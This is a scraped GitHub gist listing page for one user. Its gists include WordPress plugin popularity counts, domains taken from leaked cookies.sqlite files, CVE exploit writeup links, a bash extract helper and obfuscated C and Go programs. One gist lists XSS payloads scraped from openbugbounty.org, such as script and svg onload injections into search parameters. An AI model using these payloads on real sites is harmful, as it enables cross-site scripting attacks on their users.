Skip to content

Instantly share code, notes, and snippets.

1Password - All
2Bleftsparks - All
2n - All
3CX - All
3M Health Information Systems - CGS
7-Zip - All
7Signal - Sapphire
ABB - Alarminsight Cloud
ABB - B&R Products
ABB - Remote Service
@cranelab
cranelab / gist:940d76283414908b464074dba1aaa7af
Created February 2, 2022 18:19
all wp plugins with over 100+ active installations
5,000,000+ : wpforms-lite
5,000,000+ : wordpress-seo
5,000,000+ : woocommerce
5,000,000+ : really-simple-ssl
5,000,000+ : jetpack
5,000,000+ : elementor
5,000,000+ : contact-form-7
5,000,000+ : classic-editor
5,000,000+ : akismet
4,000,000+ : wordpress-importer
@cranelab
cranelab / gist:028ef16c7752ba12149dee7db30c7269
Created November 20, 2021 03:10
Collection of domains pulled from all cookies.sqlite files on github
2 - 01.org
1 - 06bv6fa68lc8dljc3a5rv1h8tgo79oq6.ig.ig.gmodules.com
1 - 0cf.io
1 - 1001freefonts.com
1 - 1032155592.log.optimizely.com
1 - 1034291028.log.optimizely.com
1 - 106124109.log.optimizely.com
2 - 107098409.log.optimizely.com
3 - 1096093.log.optimizely.com
1 - 111chophouse.com
CVEs:
• http://blog.ptsecurity.com/2020/03/cve-2019-18683-exploiting-linux-kernel.html
Exploiting a Linux kernel vuln. in the V4L2 subsystem (CVE-2019-18683).
• https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Turning \x00\x00 into 10000$ (CVE-2021-22555).
• https://coreruleset.org/20210630/cve-2021-35368-crs-request-body-bypass/
CRS Request Body Bypass (CVE-2021-35368).
@cranelab
cranelab / openbb-paths
Last active July 26, 2021 18:05
paths scraped from openbugbounty.org
This file has been truncated, but you can view the full file.
/search?keyword='></script>"><script>prompt(1)</script>
/topsongs.php?Worship="></script><svg/onload=alert(1)>&cat="></script><svgonload=alert(1)>
/sendss/!instep.program_locator?pDist=15&pZip="><imgsrc=xonerror=prompt(1)
/search.html?search='></script>"><script>prompt(1)</script>
/moduleslist.jsp?municipality=<Scriptsrc=1.js></script>
/arama/?kelime='></script>"><script>prompt(1)</script>&tarihlers'></script>"><script>prompt(1)</script>
/comics/creators/9565/tom_defalco?byZone=**///);alert('OPENBUGBOUNTY');/**
/saus/ws/facebookshare/fb.php?action=facebookshare&facebookdescription=Brennpunktharfulgtseksunge
/?p=virtualtours.asp&search=address&vtonly=true&hidesrchbtns=true&ic="></form><SCRipt>alertwft8rs4skn')</scrIpT>
/plugins/kalendarz.php?apgroup='></span><script>alert(/cranelab/)</script>&lang=pl&sat=2
@cranelab
cranelab / extract.sh
Last active November 3, 2021 16:04
a bash function to just get the job done
function extract() {
if [ $# -ne 1 ]; then
echo "Usage: $FUNCNAME filename"
fi
filename=$1
if [ -f $filename ]; then
case $filename in
*.tar.xz) tar xvfJ "$filename" ;;
*.tar.gz) tar --gzip -xvf "$filename" ;;
@cranelab
cranelab / gist:3256da325d2411d5399b9714bd8d36db
Last active March 4, 2021 00:16
the movie script of Hackers (1995) implemented in C - zoom out to see the movie poster
#include "stdio.h"
#include "stdlib.h"
#include "unistd.h"
char h[]=
" H a c k e r s # M ovie#Script+nTyped#by#Lo#Wang+nCode# b y # l o r d n i k o n / D e ka dence#( 201 4 / 1 0 / 0 7 ) + n+ n + n + t + t # # # # # U N I T E D #ARTIS TS #P IC TUR E S = + t +t + t## ## #prese n " \
" t s = + t + t # # # ####an#IAIN#SOFTLEY#film=+t+t+t####HACKE R S = +t+ t+ t# J O N N Y# L E E # M I LLE R=+t+t+t# #AN GE L I N A # J O L IE = + t + t + t # # F I S H E R # S T E V E N S =
@cranelab
cranelab / fizzbuzz.go
Created April 1, 2020 18:44
obfuscated FizzBuzz solution in Golang
package main
import "fmt"
func main() {
var 事 uint = 1
左 := 事 << 事
右 := 事 >> 事
あ := []byte{
byte(事<<(事<<(左)+左) + 事<<(左) + 左),